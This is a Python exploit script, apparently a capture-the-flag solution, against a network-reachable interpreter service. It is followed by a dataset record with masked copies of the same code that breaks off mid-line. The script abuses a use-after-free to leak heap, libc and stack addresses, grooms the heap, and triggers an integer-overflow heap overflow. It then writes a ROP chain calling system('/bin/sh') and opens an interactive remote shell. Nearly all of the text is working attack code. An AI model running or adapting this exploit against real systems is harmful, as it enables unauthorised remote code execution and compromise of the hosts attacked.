        self._verbose = False
        try:
            while True:
                available, _, _ = select.select([sys.stdin, self._s], [], [])
                for src in available:
                    if src == sys.stdin:
                        data = sys.stdin.buffer.read1(1024) # Only one read() call, otherwise this breaks when the tty is in raw mode
                        self.send(data)
                    else:
                        data = self.recv(4096)
                        sys.stdout.buffer.write(data)
                        sys.stdout.flush()
        except KeyboardInterrupt:
            return
        except DisconnectException:
            print_info("Server disconnected.")
            return
#
# Telnet emulation
#
def telnet(shell='/bin/bash'):
    """Telnet emulation.
    Opens a PTY on the remote end and connects the master side to the socket.
    Then spawns a shell connected to the slave end and puts the controlling TTY
    on the local machine into raw mode.
    Result: Something similar to a telnet/(plaintext)ssh session.
    Vim, htop, su, less, etc. will work with this.
    !!! This function only works if the channel is connected to a shell !!!
    NOTE(review): also assumes a `python` binary exists on the remote host.
    """
    assert(sys.stdin.isatty())
    c.setVerbose(False)
    # Open a PTY and spawn a bash connected to the slave end on the remote side
    code = 'import pty; pty.spawn([\'{}\', \'-i\'])'.format(shell)
    sendline('python -c "{}"; exit'.format(code))
    time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...
    # Should maybe put some more functionality into the inline python code instead.
    # Save current TTY settings
    old_settings = termios.tcgetattr(sys.stdin.fileno())
    # Put TTY into raw mode
    tty.setraw(sys.stdin)
    # Resize remote terminal
    # Nice-to-have: also handle terminal resize
    cols, rows = os.get_terminal_size(sys.stdin.fileno())
    sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
    recvtil('READY\r\n') # terminal echo
    recvtil('READY\r\n') # command output
    interact()
    # Restore previous settings
    termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
#
# Convenience wrappers that use the global socket instance
#
def send(b):
    """Send the raw bytes b over the global channel."""
    c.send(b)
def sendline(l):
    """Send l plus a trailing newline over the global channel."""
    c.sendline(l)
def sendnum(n):
    """Send the decimal string form of n followed by a newline."""
    c.sendnum(n)
def recv(n):
    """Receive up to n bytes from the global channel."""
    return c.recv(n)
def recvtil(delim):
    """Receive until delim is seen; returns the data including delim."""
    return c.recvtil(delim)
def recvn(n):
    """Receive exactly n bytes from the global channel."""
    return c.recvn(n)
def recvline():
    """Receive one line, including the trailing newline."""
    return c.recvline()
def recvregex(r):
    """Receive until the buffered data matches regex r; returns the match."""
    return c.recvregex(r)
def interact():
    """Bridge local stdin/stdout to the remote socket."""
    c.interact()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Setup
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Open the TCP connection used by all the convenience wrappers above.
s = socket.create_connection(TARGET)
#s.settimeout(2)
c = Channel(s, NETDEBUG)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Your code here
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Single-letter names used for variable/property creation during heap grooming.
ALPHABET = 'abcdefghijklmnopqrstuvwxyz'
def evl(code):
    """Send one statement to the target's interpreter."""
    sendline(code)
def readvar(name):
    """Return the raw interpreter output line for variable `name`.
    Sends a deliberately invalid statement ('=') first so the prompt state
    is known, then echoes the variable and captures up to the next prompt.
    """
    evl('=')
    recvtil('Bad token: 0-1\n> ')
    evl(name)
    response = recvtil('> ')
    return response.split(b'\n')[0]
def readintvar(name):
    """Read variable `name` and parse it as an integer."""
    return int(d(readvar(name)))
def readstrvar(name):
    """Read variable `name`, stripping the first and last byte
    (presumably the surrounding quote characters — verify against target output)."""
    return readvar(name)[1:-1]
def heapleak():
    """Free the lhs and rhs values during add_assign and leak a heap pointer.
    Returns the leaked pointer masked down to 4 KiB page granularity.
    """
    for i in range(16):
        evl('{}'.format(i))
    # Trigger heap info leak
    evl('h=0+0')
    return readintvar('h') & 0xfffffffffffff000
def gc(remaining):
    """Trigger garbage collection by allocating `remaining` more values."""
    for i in range(remaining):
        evl('{}'.format(i))
def leak(addr, length):
    """Leaks process memory by abusing the UAF to temporarily inject a fake string."""
    fake_str_addr = heap_base + 0xb0
    fake_str = p64(length) + p64(addr)
    evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
    for i in range(15):
        evl('{}'.format(i))
    # 19 slots filled
    # allocate 20th slot with integer value containing the addr of our fake string. The allocate_value() during do_add_assign triggers GC and frees the lhs value
    # Then the output value is allocated into the same slot. Since the output value is String (type of x),
    # lhs is turned into a string with controlled pointer
    evl('a={}+x'.format(fake_str_addr))
    gc(16)
    return readstrvar('a')[0:length]
def leak2(addr, length):
    """Same as above, but different offsets..."""
    fake_str_addr = heap_base + 0x170
    fake_str = p64(length) + p64(addr)
    evl(b'l="' + fake_str + b'"') # will be at offset 0x170 from heap start
    for i in range(12):
        evl('{}'.format(i))
    evl('a={}+x'.format(fake_str_addr))
    return readstrvar('a')[0:length]
def pwn():
    """Run the full exploit chain against the connected service.
    Stages (see the file header for the detailed write-up): heap-base leak ->
    libc leak via fake string -> stack leak via environ -> heap feng shui ->
    integer-overflow heap overflow -> stack corruption -> ROP -> shell.
    All hard-coded offsets below are specific to the challenge's libc/binary.
    """
    global heap_base
    recvtil('>')
    evl('x="XXXXXXXXXXXXXXXX"') # Workaround, need global object or else GC will crash
    # 2 slots always filled from now on (global object and int value 1337)
    heap_base = heapleak()
    # 3 slots always filled from now on
    print_good("Heap base @ 0x{:x}".format(heap_base))
    # Create a smallbin chunk so we can leak a libc pointer
    evl('"{}"'.format('A' * 0x100))
    gc(20 - 4)
    # Leak freelist pointers pointing into the libc
    heap_mem = leak(heap_base, 0x1000)
    for i in range(0, len(heap_mem)-16, 8):
        # Search for 2 consecutive pointers, those will be the flink and blink of the freed smallbin chunk
        flink = u64(heap_mem[i:i+8])
        blink = u64(heap_mem[i+8:i+16])
        if (abs(flink - heap_base) > 0x10000 and
            flink > 0x7f0000000000 and
            flink < 0x800000000000 and
            blink > 0x7f0000000000 and
            blink < 0x800000000000):
            break
    else:
        print_bad("No freelist pointers found :(")
        return
    libc = flink - 0x3c1928
    print_good("libc @ 0x{:x}".format(libc))
    # Leak stack pointer by reading environ pointer in libc
    env_ptr = u64(leak2(libc + 0x3c44a0, 8))
    print_good("stack @ 0x{:x}".format(env_ptr))
    # Calculate addresses (libc-version-specific offsets)
    system = libc + 0x46590
    bin_sh = libc + 0x180103
    pop_rdi = libc + 0x22b9a
    pop_rsi = libc + 0x24885
    pop_rdx = libc + 0x1b8e
    add_rsp_0x48 = libc + 0xf5b8b
    print_good("/bin/sh @ 0x{:x}".format(bin_sh))
    input_buf = env_ptr - 0x328
    print_good("input_buf @ 0x{:x}".format(input_buf))
    ret_addr = env_ptr - 0x328 - 8
    print_good("return address @ 0x{:x}".format(ret_addr))
    # 5 slots always filled from now
    #
    # Heap spray with Property instances to get a controlled heap layout again
    #
    # Make some objects
    evl('l.a=x')
    evl('h.a=x')
    evl('a.a=x')
    evl('b.a=x')
    evl('c.a=x')
    evl('d.a=x')
    evl('e.a=x')
    evl('f.a=x')
    # Trigger GC
    for i in range(9):
        evl('"{}"'.format('A' * 0x10))
    evl('1337')
    # 10 slots used
    # Allocate lots of properties (but no values)
    for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
        for p in ALPHABET:
            evl('{}.{}=x'.format(o, p))
    # Set up heap layout for unbounded heap overflow. We need the following layout:
    #     | chunk to overflow from | ... | Property to corrupt | ... | Fake string |
    # We overflow into "Fake string" to set it's size to 0 and avoid a segfault.
    for i in range(6):
        evl('1337')
    # Create some properties
    for i in 'ghijk':
        evl('{}=x'.format(i))
    # Fake string with length 0xffffffXX => leads to an integer overflow during string_concat and subsequently a heap buffer overflow
    fake_str = p64(0xffffffffffffffff - 0xf - (0x180 - 0x10)) + p64(0x414141414141) + b'D'*0xf0
    evl(b'n="' + fake_str + b'"')
    payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 0x100) +p64(input_buf-7)
    payload += b'\x00' * (0x180 - len(payload))
    evl(b'o="' + payload + b'"')
    fake_str_addr = heap_base + 0x1e80
    # Trigger the overflow
    evl('p=o+{}'.format(fake_str_addr))
    # Set up a fake string property in the stack ('p' points to it). We need to leak the binary base from the return address
    payload = b'A' * 0x100
    payload += p64(1) + p64(input_buf + 16 + 0x100 + 0x18) + p64(0)
    payload += p64(8) + p64(ret_addr)
    evl(payload)
    binary = readstrvar('p')
    # 2769 == offset of the leaked return address inside the binary image (target-specific).
    binary = u64(binary) - 2769
    print_good("binary @ 0x{:x}".format(binary))
    offset_to_ret = ret_addr - (input_buf & 0xffffffffffffff00)
    print_good("offset to return address: 0x{:x}".format(offset_to_ret))
    # Some unfortunate restrictions...
    if offset_to_ret > 0x28 or offset_to_ret < 0:
        print_bad("Bad offset")
        return
    # The second byte of this binary address will be (ab)used as a property name,
    # so it must be an ASCII letter.
    prop_name = p64(binary + 0xAC9)[1]
    if prop_name < ord('A') or prop_name > ord('z'):
        print_bad("Bad propery name: {}".format(prop_name))
        return
    prop_name = chr(prop_name)
    print_good("property name: {}".format(prop_name))
    # Write ROP chain into stack
    payload = b'A' * 56
    payload += p64(pop_rdi)
    payload += p64(bin_sh)
    payload += p64(system)
    validate(payload, [b'\n'])
    evl(payload)
    # Trigger corruption of InputBuffer.ptr to point further down in the stack
    evl('{}=42'.format(prop_name))
    # Next input will be written into the stack frame of readline(). Overwrite the return address with "add rsp, 0x48 ; ret"
    payload = b'A'*offset_to_ret
    payload += p64(add_rsp_0x48)
    validate(payload, [b'\n'])
    evl(payload)
    # Wait a short while and drop into interactive mode == shell
    time.sleep(0.5)
    interact()
# Entry point: run the exploit when executed as a script.
if __name__ == '__main__':
    pwn()
|
flexible
|
{
"blob_id": "e4a05cbfd0959402eacf21959c68e449d15b1e74",
"index": 7651,
"step-1": "<mask token>\n\n\ndef e(d):\n \"\"\"Encode the given string instance using UTF-8.\"\"\"\n return d.encode('UTF-8')\n\n\n<mask token>\n\n\ndef u32(d):\n \"\"\"Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian).\"\"\"\n return unpack('<I', d)[0]\n\n\n<mask token>\n\n\ndef validate(data, badchars):\n \"\"\"Assert that no badchar occurs in data.\"\"\"\n assert all(b not in data for b in badchars)\n\n\n<mask token>\n\n\ndef hexdump(data):\n \"\"\"Return a hexdump of the given data. Similar to what `hexdump -C` produces.\"\"\"\n\n def is_hexdump_printable(b):\n return (b in\n b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\\\|\\'\";:/?.,<>'\n )\n lines = []\n chunks = (data[i * 16:i * 16 + 16] for i in range((len(data) + 15) // 16))\n for i, chunk in enumerate(chunks):\n hexblock = ['{:02x}'.format(b) for b in chunk]\n left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])\n asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' 
for\n b in chunk)\n lines.append('{:08x} {:23} {:23} |{}|'.format(i * 16, left,\n right, asciiblock))\n return '\\n'.join(lines)\n\n\nclass Term:\n COLOR_BLACK = '30'\n COLOR_RED = '31'\n COLOR_GREEN = '32'\n COLOR_BROWN = '33'\n COLOR_BLUE = '34'\n COLOR_MAGENTA = '35'\n COLOR_CYAN = '36'\n COLOR_WHITE = '37'\n CLEAR = '0'\n UNDERLINE = '4'\n BOLD = '1'\n ESCAPE_START = '\\x1b['\n ESCAPE_END = 'm'\n\n\n<mask token>\n\n\nclass DisconnectException(Exception):\n pass\n\n\nclass Pattern:\n \"\"\"De-Bruijn sequence generator.\"\"\"\n alphabet = string.digits + string.ascii_letters\n\n def __init__(self, length):\n if length <= len(self.alphabet):\n self._seq = self.alphabet[:length]\n elif length <= len(self.alphabet) ** 2:\n self._seq = self._generate(2)[:length]\n elif length <= len(self.alphabet) ** 3:\n self._seq = self._generate(3)[:length]\n elif length <= len(self.alphabet) ** 4:\n self._seq = self._generate(4)[:length]\n else:\n raise Exception('Pattern length is way to large')\n\n def _generate(self, n):\n \"\"\"Generate a De Bruijn sequence.\"\"\"\n k = len(self.alphabet)\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n db(1, 1)\n return ''.join(self.alphabet[i] for i in sequence)\n\n def bytes(self):\n \"\"\"Return this sequence as bytes.\"\"\"\n return e(self._seq)\n\n def __str__(self):\n \"\"\"Return this sequence as string.\"\"\"\n return self._seq\n\n @bytes_and_strings_are_cool\n def offset(self, needle):\n \"\"\"Returns the index of 'needle' in this sequence.\n\n 'needle' should be of type string or bytes. 
If an integer is provided\n it will be treated as 32-bit or 64-bit little endian number, depending\n on its bit length.\n \"\"\"\n if isinstance(needle, int):\n if needle.bit_length() <= 32:\n needle = p32(needle)\n else:\n needle = p64(needle)\n needle = d(needle)\n idx = self._seq.index(needle)\n if self._seq[idx + len(needle):].find(needle) != -1:\n raise ValueError('Multiple occurances found!')\n return idx\n\n\nclass Channel:\n \"\"\"Convenience wrapper around a socket.\"\"\"\n OUTGOING_COLOR = Term.COLOR_RED\n INCOMING_COLOR = Term.COLOR_BLUE\n\n def __init__(self, sock, verbose):\n self._s = sock\n self._verbose = verbose\n self._buf = bytearray()\n\n def _prettyprint(self, data, outgoing):\n \"\"\"Prettyprint the given data.\n\n This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.\n Everything else is converted to hex, then printed in bold and underline for visibility.\n\n Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be\n detected in arbitrary binary streams.\n \"\"\"\n TEXT = 0\n BINARY = 1\n X = 4\n Y = 16\n Z = 2\n color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR\n parts = []\n curr = ''\n for b in data:\n if is_printable(b):\n parts.append((TEXT, b))\n else:\n parts.append((BINARY, b))\n i = 0\n mergedparts = []\n while i < len(parts):\n t = parts[i][0]\n arr = [parts[i][1]]\n j = i + 1\n while j < len(parts) and parts[j][0] == t:\n arr.append(parts[j][1])\n j += 1\n i = j\n extra = []\n if t == TEXT and len(arr) > Y and i < len(parts) - 1:\n mid = len(arr) - Z - 1\n start, end = mid, mid\n char = arr[mid]\n while start >= 0 and arr[start] == char:\n start -= 1\n while end < len(arr) and arr[end] == char:\n end += 1\n if end - start >= Y + 2 and end < len(parts):\n extra = arr[end:]\n arr = arr[:end]\n mergedparts.append((t, bytes(arr)))\n if extra:\n mergedparts.append((BINARY, bytes(extra)))\n parts = mergedparts\n 
buf = ''\n last = None\n for tag, value in parts:\n if tag == TEXT and len(value) <= X and last == BINARY:\n tag = BINARY\n if tag == TEXT:\n buf += ansi(Term.CLEAR) + ansi(color)\n else:\n buf += ansi(color, Term.BOLD, Term.UNDERLINE)\n value = hexlify(value)\n buf += d(value)\n last = tag\n buf += ansi(Term.CLEAR)\n print(buf, end='')\n sys.stdout.flush()\n\n def setVerbose(self, verbose):\n \"\"\"Set verbosity of this channel.\"\"\"\n self._verbose = verbose\n\n def recv(self, n=4096):\n \"\"\"Return up to n bytes of data from the remote end.\n\n Buffers incoming data internally.\n\n NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.\n \"\"\"\n if len(self._buf) < n:\n buf = self._s.recv(65536)\n if not buf and not self._buf:\n raise DisconnectException('Server disconnected.')\n if self._verbose:\n self._prettyprint(buf, False)\n self._buf += buf\n buf = self._buf[:n]\n self._buf = self._buf[n:]\n return buf\n\n def recvn(self, n):\n \"\"\"Return exactly n bytes of data from the remote end.\"\"\"\n data = []\n while len(data) != n:\n data.append(self.recv(1))\n return b''.join(data)\n\n @bytes_and_strings_are_cool\n def recvtil(self, delim):\n \"\"\"Read data from the remote end until delim is found in the data.\n\n The first occurance of delim is included in the returned buffer.\n \"\"\"\n buf = b''\n while not delim in buf:\n buf += self.recv(1)\n return buf\n\n def recvregex(self, regex):\n \"\"\"Receive incoming data until it matches the given regex.\n\n Returns the match object.\n\n IMPORTANT: Since the data is coming from the network, it's usually\n a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function\n will return as soon as 'addr: 0xf' is read. Instead, make sure to\n end the regex with a known sequence, e.g. 
use 'addr: 0x([0-9a-f]+)\\\\n'.\n \"\"\"\n if isinstance(regex, str):\n regex = re.compile(regex)\n buf = ''\n match = None\n while not match:\n buf += d(self.recv(1))\n match = regex.search(buf)\n return match\n\n def recvline(self):\n \"\"\"Receive and return a line from the remote end.\n\n The trailing newline character will be included in the returned buffer.\n \"\"\"\n return self.recvtil('\\n')\n\n def send(self, buf):\n \"\"\"Send all data in buf to the remote end.\"\"\"\n if self._verbose:\n self._prettyprint(buf, True)\n self._s.sendall(buf)\n\n def sendnum(self, n):\n \"\"\"Send the string representation of n followed by a newline character.\"\"\"\n self.sendline(str(n))\n\n @bytes_and_strings_are_cool\n def sendline(self, l):\n \"\"\"Prepend a newline to l and send everything to the remote end.\"\"\"\n self.send(l + b'\\n')\n\n def interact(self):\n \"\"\"Interact with the remote end: connect stdout and stdin to the socket.\"\"\"\n self._verbose = False\n try:\n while True:\n available, _, _ = select.select([sys.stdin, self._s], [], [])\n for src in available:\n if src == sys.stdin:\n data = sys.stdin.buffer.read1(1024)\n self.send(data)\n else:\n data = self.recv(4096)\n sys.stdout.buffer.write(data)\n sys.stdout.flush()\n except KeyboardInterrupt:\n return\n except DisconnectException:\n print_info('Server disconnected.')\n return\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef e(d):\n \"\"\"Encode the given string instance using UTF-8.\"\"\"\n return d.encode('UTF-8')\n\n\n<mask token>\n\n\ndef p32(d):\n \"\"\"Return d packed as 32-bit unsigned integer (little endian).\"\"\"\n return pack('<I', d)\n\n\ndef u32(d):\n \"\"\"Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian).\"\"\"\n return unpack('<I', d)[0]\n\n\n<mask token>\n\n\ndef print_bad(msg):\n print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))\n\n\ndef print_info(msg):\n print('[*] ' + msg)\n\n\n<mask token>\n\n\ndef validate(data, badchars):\n \"\"\"Assert that no badchar occurs in data.\"\"\"\n assert all(b not in data for b in badchars)\n\n\ndef is_printable(b):\n \"\"\"Return true if the given byte is a printable ASCII character.\"\"\"\n return b in e(string.printable)\n\n\ndef hexdump(data):\n \"\"\"Return a hexdump of the given data. Similar to what `hexdump -C` produces.\"\"\"\n\n def is_hexdump_printable(b):\n return (b in\n b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\\\|\\'\";:/?.,<>'\n )\n lines = []\n chunks = (data[i * 16:i * 16 + 16] for i in range((len(data) + 15) // 16))\n for i, chunk in enumerate(chunks):\n hexblock = ['{:02x}'.format(b) for b in chunk]\n left, right = ' '.join(hexblock[:8]), ' '.join(hexblock[8:])\n asciiblock = ''.join(chr(b) if is_hexdump_printable(b) else '.' 
for\n b in chunk)\n lines.append('{:08x} {:23} {:23} |{}|'.format(i * 16, left,\n right, asciiblock))\n return '\\n'.join(lines)\n\n\nclass Term:\n COLOR_BLACK = '30'\n COLOR_RED = '31'\n COLOR_GREEN = '32'\n COLOR_BROWN = '33'\n COLOR_BLUE = '34'\n COLOR_MAGENTA = '35'\n COLOR_CYAN = '36'\n COLOR_WHITE = '37'\n CLEAR = '0'\n UNDERLINE = '4'\n BOLD = '1'\n ESCAPE_START = '\\x1b['\n ESCAPE_END = 'm'\n\n\n<mask token>\n\n\nclass DisconnectException(Exception):\n pass\n\n\nclass Pattern:\n \"\"\"De-Bruijn sequence generator.\"\"\"\n alphabet = string.digits + string.ascii_letters\n\n def __init__(self, length):\n if length <= len(self.alphabet):\n self._seq = self.alphabet[:length]\n elif length <= len(self.alphabet) ** 2:\n self._seq = self._generate(2)[:length]\n elif length <= len(self.alphabet) ** 3:\n self._seq = self._generate(3)[:length]\n elif length <= len(self.alphabet) ** 4:\n self._seq = self._generate(4)[:length]\n else:\n raise Exception('Pattern length is way to large')\n\n def _generate(self, n):\n \"\"\"Generate a De Bruijn sequence.\"\"\"\n k = len(self.alphabet)\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n db(1, 1)\n return ''.join(self.alphabet[i] for i in sequence)\n\n def bytes(self):\n \"\"\"Return this sequence as bytes.\"\"\"\n return e(self._seq)\n\n def __str__(self):\n \"\"\"Return this sequence as string.\"\"\"\n return self._seq\n\n @bytes_and_strings_are_cool\n def offset(self, needle):\n \"\"\"Returns the index of 'needle' in this sequence.\n\n 'needle' should be of type string or bytes. 
If an integer is provided\n it will be treated as 32-bit or 64-bit little endian number, depending\n on its bit length.\n \"\"\"\n if isinstance(needle, int):\n if needle.bit_length() <= 32:\n needle = p32(needle)\n else:\n needle = p64(needle)\n needle = d(needle)\n idx = self._seq.index(needle)\n if self._seq[idx + len(needle):].find(needle) != -1:\n raise ValueError('Multiple occurances found!')\n return idx\n\n\nclass Channel:\n \"\"\"Convenience wrapper around a socket.\"\"\"\n OUTGOING_COLOR = Term.COLOR_RED\n INCOMING_COLOR = Term.COLOR_BLUE\n\n def __init__(self, sock, verbose):\n self._s = sock\n self._verbose = verbose\n self._buf = bytearray()\n\n def _prettyprint(self, data, outgoing):\n \"\"\"Prettyprint the given data.\n\n This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.\n Everything else is converted to hex, then printed in bold and underline for visibility.\n\n Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be\n detected in arbitrary binary streams.\n \"\"\"\n TEXT = 0\n BINARY = 1\n X = 4\n Y = 16\n Z = 2\n color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR\n parts = []\n curr = ''\n for b in data:\n if is_printable(b):\n parts.append((TEXT, b))\n else:\n parts.append((BINARY, b))\n i = 0\n mergedparts = []\n while i < len(parts):\n t = parts[i][0]\n arr = [parts[i][1]]\n j = i + 1\n while j < len(parts) and parts[j][0] == t:\n arr.append(parts[j][1])\n j += 1\n i = j\n extra = []\n if t == TEXT and len(arr) > Y and i < len(parts) - 1:\n mid = len(arr) - Z - 1\n start, end = mid, mid\n char = arr[mid]\n while start >= 0 and arr[start] == char:\n start -= 1\n while end < len(arr) and arr[end] == char:\n end += 1\n if end - start >= Y + 2 and end < len(parts):\n extra = arr[end:]\n arr = arr[:end]\n mergedparts.append((t, bytes(arr)))\n if extra:\n mergedparts.append((BINARY, bytes(extra)))\n parts = mergedparts\n 
buf = ''\n last = None\n for tag, value in parts:\n if tag == TEXT and len(value) <= X and last == BINARY:\n tag = BINARY\n if tag == TEXT:\n buf += ansi(Term.CLEAR) + ansi(color)\n else:\n buf += ansi(color, Term.BOLD, Term.UNDERLINE)\n value = hexlify(value)\n buf += d(value)\n last = tag\n buf += ansi(Term.CLEAR)\n print(buf, end='')\n sys.stdout.flush()\n\n def setVerbose(self, verbose):\n \"\"\"Set verbosity of this channel.\"\"\"\n self._verbose = verbose\n\n def recv(self, n=4096):\n \"\"\"Return up to n bytes of data from the remote end.\n\n Buffers incoming data internally.\n\n NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.\n \"\"\"\n if len(self._buf) < n:\n buf = self._s.recv(65536)\n if not buf and not self._buf:\n raise DisconnectException('Server disconnected.')\n if self._verbose:\n self._prettyprint(buf, False)\n self._buf += buf\n buf = self._buf[:n]\n self._buf = self._buf[n:]\n return buf\n\n def recvn(self, n):\n \"\"\"Return exactly n bytes of data from the remote end.\"\"\"\n data = []\n while len(data) != n:\n data.append(self.recv(1))\n return b''.join(data)\n\n @bytes_and_strings_are_cool\n def recvtil(self, delim):\n \"\"\"Read data from the remote end until delim is found in the data.\n\n The first occurance of delim is included in the returned buffer.\n \"\"\"\n buf = b''\n while not delim in buf:\n buf += self.recv(1)\n return buf\n\n def recvregex(self, regex):\n \"\"\"Receive incoming data until it matches the given regex.\n\n Returns the match object.\n\n IMPORTANT: Since the data is coming from the network, it's usually\n a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function\n will return as soon as 'addr: 0xf' is read. Instead, make sure to\n end the regex with a known sequence, e.g. 
use 'addr: 0x([0-9a-f]+)\\\\n'.\n \"\"\"\n if isinstance(regex, str):\n regex = re.compile(regex)\n buf = ''\n match = None\n while not match:\n buf += d(self.recv(1))\n match = regex.search(buf)\n return match\n\n def recvline(self):\n \"\"\"Receive and return a line from the remote end.\n\n The trailing newline character will be included in the returned buffer.\n \"\"\"\n return self.recvtil('\\n')\n\n def send(self, buf):\n \"\"\"Send all data in buf to the remote end.\"\"\"\n if self._verbose:\n self._prettyprint(buf, True)\n self._s.sendall(buf)\n\n def sendnum(self, n):\n \"\"\"Send the string representation of n followed by a newline character.\"\"\"\n self.sendline(str(n))\n\n @bytes_and_strings_are_cool\n def sendline(self, l):\n \"\"\"Prepend a newline to l and send everything to the remote end.\"\"\"\n self.send(l + b'\\n')\n\n def interact(self):\n \"\"\"Interact with the remote end: connect stdout and stdin to the socket.\"\"\"\n self._verbose = False\n try:\n while True:\n available, _, _ = select.select([sys.stdin, self._s], [], [])\n for src in available:\n if src == sys.stdin:\n data = sys.stdin.buffer.read1(1024)\n self.send(data)\n else:\n data = self.recv(4096)\n sys.stdout.buffer.write(data)\n sys.stdout.flush()\n except KeyboardInterrupt:\n return\n except DisconnectException:\n print_info('Server disconnected.')\n return\n\n\n<mask token>\n\n\ndef send(b):\n c.send(b)\n\n\ndef sendline(l):\n c.sendline(l)\n\n\ndef sendnum(n):\n c.sendnum(n)\n\n\n<mask token>\n\n\ndef recvtil(delim):\n return c.recvtil(delim)\n\n\n<mask token>\n\n\ndef interact():\n c.interact()\n\n\n<mask token>\n\n\ndef readvar(name):\n evl('=')\n recvtil('Bad token: 0-1\\n> ')\n evl(name)\n response = recvtil('> ')\n return response.split(b'\\n')[0]\n\n\ndef readintvar(name):\n return int(d(readvar(name)))\n\n\n<mask token>\n\n\ndef gc(remaining):\n \"\"\"Trigger gargabe collection\"\"\"\n for i in range(remaining):\n evl('{}'.format(i))\n\n\ndef leak(addr, length):\n 
\"\"\"Leaks process memory by abusing the UAF to temporarily inject a fake string.\"\"\"\n fake_str_addr = heap_base + 176\n fake_str = p64(length) + p64(addr)\n evl(b'l=\"' + fake_str + b'\"')\n for i in range(15):\n evl('{}'.format(i))\n evl('a={}+x'.format(fake_str_addr))\n gc(16)\n return readstrvar('a')[0:length]\n\n\n<mask token>\n\n\ndef pwn():\n global heap_base\n recvtil('>')\n evl('x=\"XXXXXXXXXXXXXXXX\"')\n heap_base = heapleak()\n print_good('Heap base @ 0x{:x}'.format(heap_base))\n evl('\"{}\"'.format('A' * 256))\n gc(20 - 4)\n heap_mem = leak(heap_base, 4096)\n for i in range(0, len(heap_mem) - 16, 8):\n flink = u64(heap_mem[i:i + 8])\n blink = u64(heap_mem[i + 8:i + 16])\n if (abs(flink - heap_base) > 65536 and flink > 139637976727552 and \n flink < 140737488355328 and blink > 139637976727552 and blink <\n 140737488355328):\n break\n else:\n print_bad('No freelist pointers found :(')\n return\n libc = flink - 3938600\n print_good('libc @ 0x{:x}'.format(libc))\n env_ptr = u64(leak2(libc + 3949728, 8))\n print_good('stack @ 0x{:x}'.format(env_ptr))\n system = libc + 288144\n bin_sh = libc + 1573123\n pop_rdi = libc + 142234\n pop_rsi = libc + 149637\n pop_rdx = libc + 7054\n add_rsp_0x48 = libc + 1006475\n print_good('/bin/sh @ 0x{:x}'.format(bin_sh))\n input_buf = env_ptr - 808\n print_good('input_buf @ 0x{:x}'.format(input_buf))\n ret_addr = env_ptr - 808 - 8\n print_good('return address @ 0x{:x}'.format(ret_addr))\n evl('l.a=x')\n evl('h.a=x')\n evl('a.a=x')\n evl('b.a=x')\n evl('c.a=x')\n evl('d.a=x')\n evl('e.a=x')\n evl('f.a=x')\n for i in range(9):\n evl('\"{}\"'.format('A' * 16))\n evl('1337')\n for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:\n for p in ALPHABET:\n evl('{}.{}=x'.format(o, p))\n for i in range(6):\n evl('1337')\n for i in 'ghijk':\n evl('{}=x'.format(i))\n fake_str = p64(18446744073709551615 - 15 - (384 - 16)) + p64(71748523475265\n ) + b'D' * 240\n evl(b'n=\"' + fake_str + b'\"')\n payload = b'\\x00' * 64 + 
p64(ord('p')) + p64(input_buf + 16 + 256) + p64(\n input_buf - 7)\n payload += b'\\x00' * (384 - len(payload))\n evl(b'o=\"' + payload + b'\"')\n fake_str_addr = heap_base + 7808\n evl('p=o+{}'.format(fake_str_addr))\n payload = b'A' * 256\n payload += p64(1) + p64(input_buf + 16 + 256 + 24) + p64(0)\n payload += p64(8) + p64(ret_addr)\n evl(payload)\n binary = readstrvar('p')\n binary = u64(binary) - 2769\n print_good('binary @ 0x{:x}'.format(binary))\n offset_to_ret = ret_addr - (input_buf & 18446744073709551360)\n print_good('offset to return address: 0x{:x}'.format(offset_to_ret))\n if offset_to_ret > 40 or offset_to_ret < 0:\n print_bad('Bad offset')\n return\n prop_name = p64(binary + 2761)[1]\n if prop_name < ord('A') or prop_name > ord('z'):\n print_bad('Bad propery name: {}'.format(prop_name))\n return\n prop_name = chr(prop_name)\n print_good('property name: {}'.format(prop_name))\n payload = b'A' * 56\n payload += p64(pop_rdi)\n payload += p64(bin_sh)\n payload += p64(system)\n validate(payload, [b'\\n'])\n evl(payload)\n evl('{}=42'.format(prop_name))\n payload = b'A' * offset_to_ret\n payload += 